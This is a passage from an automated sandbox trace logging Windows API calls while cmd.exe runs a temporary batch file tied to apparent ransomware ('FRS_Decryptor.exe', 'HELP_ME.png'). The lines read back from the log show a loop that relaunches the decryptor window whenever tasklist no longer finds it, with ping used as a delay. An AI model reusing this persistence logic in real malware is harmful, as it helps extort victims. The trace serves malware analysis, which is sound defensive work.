10 127.1>nul\r\nE_HELP_ME.png\r\n") returned 22 [0081.176] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0081.176] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0081.176] GetFileType (hFile=0x2f0) returned 0x1 [0081.176] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0081.176] ReadFile (in: hFile=0x2f0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xe4, lpOverlapped=0x0) returned 1 [0081.176] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=2477, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0081.176] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\FRS_Decryptor.exe\r\n\r\n") returned 35 [0081.177] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0081.177] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0081.177] GetFileType (hFile=0x2f0) returned 0x1 [0081.177] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0081.177] ReadFile (in: hFile=0x2f0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xc1, lpOverlapped=0x0) returned 1 [0081.177] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=2485, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0081.177] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 4\r\nYFILES%\\FRS_Decryptor.exe\r\n") returned 8 [0081.177] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0081.177] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0081.177] GetFileType (hFile=0x2f0) returned 0x1 [0081.177] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0081.177] ReadFile (in: hFile=0x2f0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xb9, lpOverlapped=0x0) returned 1 [0081.177] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=2487, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0081.177] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 4\r\n") returned 2 [0081.177] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0081.177] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0081.177] GetFileType (hFile=0x2f0) returned 0x1 [0081.177] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0081.177] ReadFile (in: hFile=0x2f0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xb7, lpOverlapped=0x0) returned 1 [0081.177] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=2491, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0081.177] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":4\r\n 4\r\n") returned 4 [0081.177] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0081.177] _get_osfhandle (_FileHandle=1) returned 0x28 [0081.177] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0081.178] _get_osfhandle (_FileHandle=0) returned 0x24 [0081.178] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0081.178] SetConsoleInputExeNameW () returned 0x1 [0081.178] GetConsoleOutputCP () returned 0x1b5 [0081.178] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0081.178] SetThreadUILanguage (LangId=0x0) returned 0x409 [0081.178] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f0 [0081.178] _open_osfhandle (_OSFileHandle=0x2f0, _Flags=8) returned 3 [0081.178] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0081.178] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=2491, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0081.178] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0081.178] ReadFile (in: hFile=0x2f0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0xb3, lpOverlapped=0x0) returned 1 [0081.178] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=2512, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0081.178] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=21, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="ping -n 3 127.1>nul\r\nryptor.exe\" goto 4)\r\n/i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 21 [0081.178] GetFileType (hFile=0x2f0) returned 0x1 [0081.178] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0081.178] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0081.178] _tell (_FileHandle=3) returned 2512 [0081.179] _close (_FileHandle=3) returned 0 [0081.179] _wcsicmp (_String1="ping", _String2="DIR") returned 12 [0081.179] _wcsicmp (_String1="ping", _String2="ERASE") returned 11 [0081.179] _wcsicmp (_String1="ping", _String2="DEL") returned 12 [0081.179] _wcsicmp (_String1="ping", _String2="TYPE") returned -4 [0081.179] _wcsicmp (_String1="ping", _String2="COPY") returned 13 [0081.179] _wcsicmp (_String1="ping", _String2="CD") returned 13 [0081.179] _wcsicmp (_String1="ping", _String2="CHDIR") returned 13 [0081.179] _wcsicmp (_String1="ping", _String2="RENAME") returned -2 [0081.179] _wcsicmp (_String1="ping", _String2="REN") returned -2 [0081.179] _wcsicmp (_String1="ping", _String2="ECHO") returned 11 [0081.179] _wcsicmp (_String1="ping", _String2="SET") returned -3 [0081.179] _wcsicmp (_String1="ping", _String2="PAUSE") returned 8 [0081.179] _wcsicmp (_String1="ping", _String2="DATE") returned 12 [0081.179] _wcsicmp (_String1="ping", _String2="TIME") returned -4 [0081.179] _wcsicmp (_String1="ping", _String2="PROMPT") returned -9 [0081.179] _wcsicmp (_String1="ping", _String2="MD") returned 3 [0081.179] _wcsicmp (_String1="ping", _String2="MKDIR") returned 3 [0081.179] _wcsicmp (_String1="ping", _String2="RD") returned -2 [0081.179] _wcsicmp (_String1="ping", _String2="RMDIR") returned -2 [0081.179] _wcsicmp (_String1="ping", _String2="PATH") returned 8 [0081.179] _wcsicmp (_String1="ping", _String2="GOTO") returned 9 [0081.179] _wcsicmp (_String1="ping", _String2="SHIFT") returned -3 [0081.179] _wcsicmp (_String1="ping", _String2="CLS") returned 13 [0081.179] _wcsicmp (_String1="ping", _String2="CALL") returned 13 [0081.179] _wcsicmp (_String1="ping", _String2="VERIFY") returned -6 [0081.179] _wcsicmp (_String1="ping", _String2="VER") returned -6 [0081.179] _wcsicmp (_String1="ping", _String2="VOL") returned -6 [0081.179] _wcsicmp (_String1="ping", _String2="EXIT") returned 11 [0081.179] _wcsicmp (_String1="ping", _String2="SETLOCAL") returned -3 [0081.179] _wcsicmp (_String1="ping", _String2="ENDLOCAL") returned 11 [0081.179] _wcsicmp (_String1="ping", _String2="TITLE") returned -4 [0081.179] _wcsicmp (_String1="ping", _String2="START") returned -3 [0081.179] _wcsicmp (_String1="ping", _String2="DPATH") returned 12 [0081.179] _wcsicmp (_String1="ping", _String2="KEYS") returned 5 [0081.179] _wcsicmp (_String1="ping", _String2="MOVE") returned 3 [0081.179] _wcsicmp (_String1="ping", _String2="PUSHD") returned -12 [0081.179] _wcsicmp (_String1="ping", _String2="POPD") returned -6 [0081.179] _wcsicmp (_String1="ping", _String2="ASSOC") returned 15 [0081.179] _wcsicmp (_String1="ping", _String2="FTYPE") returned 10 [0081.179] _wcsicmp (_String1="ping", _String2="BREAK") returned 14 [0081.179] _wcsicmp (_String1="ping", _String2="COLOR") returned 13 [0081.179] _wcsicmp (_String1="ping", _String2="MKLINK") returned 3 [0081.179] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0081.179] SetErrorMode (uMode=0x0) returned 0x0 [0081.179] SetErrorMode (uMode=0x1) returned 0x0 [0081.180] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd61410, lpFilePart=0xc8efcc | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8efcc*="Desktop") returned 0x1c [0081.180] SetErrorMode (uMode=0x0) returned 0x1 [0081.180] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0081.180] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0081.180] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0081.180] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0081.180] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xffffffff [0081.180] GetLastError () returned 0x2 [0081.180] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0081.180] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xd5a170 [0081.180] FindClose (in: hFindFile=0xd5a170 | out: hFindFile=0xd5a170) returned 1 [0081.180] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xffffffff [0081.180] GetLastError () returned 0x2 [0081.180] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xd59e70 [0081.180] FindClose (in: hFindFile=0xd59e70 | out: hFindFile=0xd59e70) returned 1 [0081.180] GetFileType (hFile=0x28) returned 0x2 [0081.180] GetStdHandle (nStdHandle=0xfffffff5) returned 0x28 [0081.180] _dup (_FileHandle=1) returned 3 [0081.180] _close (_FileHandle=1) returned 0 [0081.181] _wcsicmp (_String1="nul", _String2="con") returned 11 [0081.181] CreateFileW (lpFileName="nul" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0xc8ef94, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28 [0081.181] _open_osfhandle (_OSFileHandle=0x28, _Flags=8) returned 1 [0081.181] GetConsoleTitleW (in: lpConsoleTitle=0xc8edb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0081.181] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0081.181] SetErrorMode (uMode=0x0) returned 0x0 [0081.181] SetErrorMode (uMode=0x1) returned 0x0 [0081.181] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd61468, lpFilePart=0xc8e8b4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8e8b4*="Desktop") returned 0x1c [0081.181] SetErrorMode (uMode=0x0) returned 0x1 [0081.181] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0081.181] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0081.181] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0081.181] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0081.181] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xffffffff [0081.181] GetLastError () returned 0x2 [0081.181] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0081.181] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xd5a1f0 [0081.181] FindClose (in: hFindFile=0xd5a1f0 | out: hFindFile=0xd5a1f0) returned 1 [0081.181] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xffffffff [0081.182] GetLastError () returned 0x2 [0081.182] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xd5a1f0 [0081.182] FindClose (in: hFindFile=0xd5a1f0 | out: hFindFile=0xd5a1f0) returned 1 [0081.182] GetConsoleTitleW (in: lpConsoleTitle=0xc8eb3c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0081.182] InitializeProcThreadAttributeList (in: lpAttributeList=0xc8ea68, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xc8ea4c | out: lpAttributeList=0xc8ea68, lpSize=0xc8ea4c) returned 1 [0081.182] UpdateProcThreadAttribute (in: lpAttributeList=0xc8ea68, dwFlags=0x0, Attribute=0x60001, lpValue=0xc8ea54, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xc8ea68, lpPreviousValue=0x0) returned 1 [0081.182] GetStartupInfoW (in: lpStartupInfo=0xc8eaa0 | out: lpStartupInfo=0xc8eaa0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0081.182] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0081.182] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0081.182] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0081.182] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0081.182] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0081.182] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0081.182] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0081.182] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0081.182] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0081.182] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0081.182] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0081.182] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0081.182] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0081.182] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0081.182] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0081.182] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0081.182] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0081.182] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0081.182] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0081.182] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0081.182] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0081.182] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0081.182] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0081.182] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0081.182] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0081.182] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0081.182] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0081.182] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0081.183] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0081.183] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0081.183] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0081.183] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0081.183] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0081.183] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0081.183] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0081.183] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0081.183] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0081.183] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0081.183] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0081.183] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0081.183] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0081.183] lstrcmpW (lpString1="\\PING.EXE", lpString2="\\XCOPY.EXE") returned -1 [0081.183] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\PING.EXE", lpCommandLine="ping -n 3 127.1", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xc8e9f0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ping -n 3 127.1", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xc8ea3c | out: lpCommandLine="ping -n 3 127.1", lpProcessInformation=0xc8ea3c*(hProcess=0x260, hThread=0x158, dwProcessId=0xbd4, dwThreadId=0xbd0)) returned 1 [0081.185] CloseHandle (hObject=0x158) returned 1 [0081.185] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0081.185] GetEnvironmentStringsW () returned 0xd2c668* [0081.185] FreeEnvironmentStringsA (penv="=") returned 1 [0081.185] WaitForSingleObject (hHandle=0x260, dwMilliseconds=0xffffffff) returned 0x0 [0083.254] GetExitCodeProcess (in: hProcess=0x260, lpExitCode=0xc8e9d4 | out: lpExitCode=0xc8e9d4*=0x0) returned 1 [0083.254] CloseHandle (hObject=0x260) returned 1 [0083.254] _vsnwprintf (in: _Buffer=0xc8eabc, _BufferCount=0x13, _Format="%08X", _ArgList=0xc8e9dc | out: _Buffer="00000000") returned 8 [0083.254] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0083.254] GetEnvironmentStringsW () returned 0xd30508* [0083.254] FreeEnvironmentStringsA (penv="=") returned 1 [0083.254] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0083.254] GetEnvironmentStringsW () returned 0xd2c668* [0083.254] FreeEnvironmentStringsA (penv="=") returned 1 [0083.254] DeleteProcThreadAttributeList (in: lpAttributeList=0xc8ea68 | out: lpAttributeList=0xc8ea68) [0083.254] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0083.255] _close (_FileHandle=3) returned 0 [0083.255] _get_osfhandle (_FileHandle=1) returned 0x28 [0083.255] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0083.255] _get_osfhandle (_FileHandle=1) returned 0x28 [0083.255] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0083.255] _get_osfhandle (_FileHandle=0) returned 0x24 [0083.255] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0083.255] SetConsoleInputExeNameW () returned 0x1 [0083.255] GetConsoleOutputCP () returned 0x1b5 [0083.255] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0083.255] SetThreadUILanguage (LangId=0x0) returned 0x409 [0083.256] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f0 [0083.256] _open_osfhandle (_OSFileHandle=0x2f0, _Flags=8) returned 3 [0083.256] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0083.256] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=2512, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0083.256] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0083.256] ReadFile (in: hFile=0x2f0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x9e, lpOverlapped=0x0) returned 1 [0083.256] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=2585, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0083.256] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="for /f \"delims= \" %%i in ('tasklist^|find /i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 73 [0083.256] GetFileType (hFile=0x2f0) returned 0x1 [0083.257] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0083.257] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0083.257] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0083.257] ReadFile (in: hFile=0x2f0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f02c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f02c*=0x55, lpOverlapped=0x0) returned 1 [0083.257] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=2627, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0083.257] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=42, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="if /i \"%%i\"==\"FRS_Decryptor.exe\" goto 4)\r\n/i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 42 [0083.257] GetFileType (hFile=0x2f0) returned 0x1 [0083.257] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0083.257] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0083.257] _tell (_FileHandle=3) returned 2627 [0083.257] _close (_FileHandle=3) returned 0 [0083.257] _wcsnicmp (_String1="delims= ", _String2="usebackq", _MaxCount=0x8) returned -17 [0083.257] _wcsnicmp (_String1="delims=", _String2="useback", _MaxCount=0x7) returned -17 [0083.257] _wcsnicmp (_String1="deli", _String2="eol=", _MaxCount=0x4) returned -1 [0083.257] _wcsnicmp (_String1="delims=", 